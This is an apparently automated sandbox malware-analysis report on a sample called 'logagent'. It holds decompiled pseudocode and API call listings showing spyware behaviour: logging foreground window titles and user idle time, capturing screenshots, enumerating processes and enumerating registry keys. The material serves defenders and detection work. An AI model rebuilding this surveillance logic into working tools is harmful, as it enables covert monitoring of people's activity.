				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E00413E72(E00405BB5);
					}
					Sleep(0x1f4);
					_t93 = GetForegroundWindow();
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x41b93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L00414176();
								L00414170();
								_t99 = _t99 - 0x10 + 0x18;
								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E00405DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94;
					E00406C35(_t94);
					if(E0041269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E0041269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L00414176();
								L00414170();
								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}























                                  0x004059c7
                                  0x004059cc
                                  0x004059cc
                                  0x004059d2
                                  0x00000000
                                  0x00000000
                                  0x004059e4
                                  0x004059e6
                                  0x004059f6
                                  0x00405a01
                                  0x00405a06
                                  0x00405a0c
                                  0x00405a18
                                  0x00405a1b
                                  0x00405a21
                                  0x00405a28
                                  0x00405a28
                                  0x00405a2f
                                  0x00405a37
                                  0x00405a40
                                  0x00405a4a
                                  0x00405a52
                                  0x00405a58
                                  0x00405a61
                                  0x00405a6b
                                  0x00405a6d
                                  0x00405a76
                                  0x00405a7f
                                  0x00405a8a
                                  0x00405a90
                                  0x00405a96
                                  0x00405ab5
                                  0x00405ac9
                                  0x00405ad3
                                  0x00405adb
                                  0x00405ade
                                  0x00405ae6
                                  0x00405a98
                                  0x00405a98
                                  0x00405aa1
                                  0x00405aaa
                                  0x00405aaa
                                  0x00405a96
                                  0x00405a6b
                                  0x00405aec
                                  0x00405aef
                                  0x00405af1
                                  0x00405b02
                                  0x00405b97
                                  0x00405b9a
                                  0x00000000
                                  0x00405b08
                                  0x00405b08
                                  0x00405b16
                                  0x00405b1d
                                  0x00405b3d
                                  0x00405b4d
                                  0x00405b5c
                                  0x00405b6c
                                  0x00405b76
                                  0x00405b7b
                                  0x00405b80
                                  0x00405b88
                                  0x00405b91
                                  0x00000000
                                  0x00405b91
                                  0x00405b24
                                  0x00405b27
                                  0x00405b27
                                  0x00405ba8
                                  0x00000000
                                  0x00405ba8
                                  0x00405b02
                                  0x00405bb4

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                  • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                  • GetForegroundWindow.USER32 ref: 00405A12
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                  • GetWindowTextA.USER32 ref: 00405A52
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                  • _itoa.MSVCRT ref: 00405B3D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                  • String ID: [ ${ User has been idle for $ ]$ minutes }
                                  • API String ID: 615312007-3343415809
                                  • Opcode ID: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                  • Opcode Fuzzy Hash: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041093F Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 131fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                    • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                  • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                  • String ID: dat$image/png$png
                                  • API String ID: 3276867942-186023265
                                  • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                  • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409EAA Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409ECF
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                    • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6DF7CB60), ref: 00412B5E
                                    • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                  • String ID:
                                  • API String ID: 819894693-0
                                  • Opcode ID: aa41e3f6cb2fc5e209ae9a7f481b9b05acfc944ab05c561c6cee0746ec8840d9
                                  • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                  • Opcode Fuzzy Hash: aa41e3f6cb2fc5e209ae9a7f481b9b05acfc944ab05c561c6cee0746ec8840d9
                                  • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BB20 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 191registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(0040BE7D,?,00000104,00000000,0040BE7D,?,?,00000000,?,?,?,?), ref: 0040BB8F
                                  • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                  • _itoa.MSVCRT ref: 0040BC7E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
